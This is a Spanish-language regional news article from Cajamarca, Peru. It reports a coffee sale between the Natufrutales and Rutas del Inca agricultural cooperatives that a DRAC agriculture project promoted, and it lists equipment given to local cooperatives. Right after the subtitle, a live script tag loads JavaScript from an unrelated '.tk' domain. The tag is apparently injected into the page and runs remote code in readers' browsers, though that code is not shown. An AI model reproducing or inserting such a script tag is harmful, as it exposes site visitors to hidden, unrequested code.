Ingresar

DRAC ARTICULA A PRODUCTORES EN LA COMERCIALIZACIÓN DE CAFÉ

Miércoles, 4 Octubre, 2017 - 08:48
El Proyecto promovió el intercambio entre las cooperativas agrarias Natufrutales de El Tuco y Rutas del Inca de Querocoto.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

La Dirección Regional de Agricultura de Cajamarca, a través del Proyecto Mejoramiento de la Provisión de los Servicios Agrarios - DRAC, promovió el intercambio comercial de café entre las cooperativas agrarias Natufrutales, del centro poblado de El Tuco (Bambamarca - Hualgayoc) y Rutas del Inca (Querocoto - Chota).

La cooperativa Natufrutales comercializó 70 quintales de café a la cooperativa Rutas del Inca, negociación que generó 30 mil soles, recursos que benefician a los 57 socios de la entidad de la provincia de Hualgayoc.

Este proceso de articulación comercial que promueve el Proyecto Mejoramiento de la Provisión de Servicios Agrarios de la DRAC y la Agencia Agraria Hualgayoc - Bambamarca permitió que los socios de la cooperativa participen activamente en todo el proceso de la evaluación de calidad del café, que comprende rendimiento, humedad y catación.

El presidente del consejo de administración de la cooperativa agraria Natufrutales, Manuel Carranza Guevara, dijo que cuando participaron individualmente no tuvieron una buena venta del café, pero gracias al proyecto de Mejoramiento de la Provisión de Servicios Agrarios de la DRAC, quienes les dieron constante capacitación en los temas de Asociatividad, por fin lograron una ganancia muy buena que beneficia a todos los socios.

El dirigente aseguró que -ahora- tienen bien claro que individualmente no pueden conseguir nada, resaltando -como dice una frase muy conocida- “la unión hace la fuerza”.

En otro momento, Carranza Guevara solicitó que el Gobierno Regional Cajamarca apoye “a todos los hermanos del campo que se dedican a la agricultura y la ganadería, ya que solo con ello se sacará adelante a nuestra región de Cajamarca, porque un nuevo modelo de desarrollo sí es posible”.

DATOS
La DRAC distribuyó a las cooperativas de Celendín: 05 balanzas electrónicas x 150 Kg., 01 balanzas electrónica de precisión, 03 estufas y/o horno microondas, 1000 jabas para cosecha, 03 motos hoyadoras,  03 fumigadoras estacionarias con motor, 06 navajas de injertar. A Bambamarca: 03  balanzas electrónicas x 150 Kg., 08 cuchillas para banano, 500 javas para banano. A San Marcos: 300 jabas para cosecha.

AdjuntoTamaño
PDF icon descargue 200.02 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen